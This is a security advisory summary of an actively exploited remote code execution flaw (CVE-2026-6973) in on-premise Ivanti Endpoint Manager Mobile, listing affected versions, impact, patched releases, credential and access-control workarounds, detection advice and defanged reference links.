Full Report
Ivanti warned customers today to patch a high-severity remote code execution vulnerability in Endpoint Manager Mobile (EPMM) exploited in zero-day attacks. [...]
Analysis Summary
# Vulnerability: Remote Code Execution in Ivanti Endpoint Manager Mobile (EPMM)
## CVE Details
- **CVE ID:** CVE-2026-6973
- **CVSS Score:** High Severity (Specific numerical score not provided in text)
- **CWE:** Improper Input Validation
## Affected Systems
- **Products:** Ivanti Endpoint Manager Mobile (EPMM) - On-premise version only.
- **Versions:** 12.8.0.0 and earlier.
- **Configurations:** Systems where administrative interfaces are accessible, as the exploit requires administrative privileges.
*Note: Ivanti Neurons for MDM, Ivanti EPM, and Ivanti Sentry are not affected.*
## Vulnerability Description
The vulnerability stems from an Improper Input Validation weakness. If successfully exploited, it allows a remote attacker with administrative privileges to execute arbitrary code on the underlying operating system of the targeted EPMM instance.
## Exploitation
- **Status:** Exploited in the wild (Zero-day).
- **Complexity:** Low (requires admin credentials).
- **Attack Vector:** Network.
## Impact
- **Confidentiality:** High (Full system access).
- **Integrity:** High (Ability to execute arbitrary code/modify system files).
- **Availability:** High (Potential for system takeover or disruption).
## Remediation
### Patches
Ivanti has released the following security updates to address the flaw:
- EPMM 12.6.1.1
- EPMM 12.7.0.1
- EPMM 12.8.0.1
### Workarounds
- **Credential Management:** Review all accounts with Admin rights and rotate credentials immediately.
- **Access Control:** Ensure administrative interfaces are not exposed to the public internet where possible.
## Detection
- **Indicators of Compromise:** Review audit logs for unauthorized administrative logins or unusual shell commands.
- **Detection Methods:**
- Use the Shadowserver dashboard to check for exposed EPMM fingerprints.
- Monitor for secondary vulnerabilities released in the same cycle (CVE-2026-5786, CVE-2026-5787, CVE-2026-5788, and CVE-2026-7821) which may be used by attackers to gain the admin access required for CVE-2026-6973.
## References
- Ivanti Blog: hxxps[://]www[.]ivanti[.]com/blog/may-2026-epmm-security-update
- Ivanti Security Advisory: hxxps[://]hub[.]ivanti[.]com/s/article/May-2026-Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-Multiple-CVEs?language=en_US
- Shadowserver IoT Statistics: hxxps[://]dashboard[.]shadowserver[.]org/statistics/iot-devices/time-series/?date_range=7&vendor=ivanti&model=epmm&dataset=count&limit=100&group_by=geo&stacking=stacked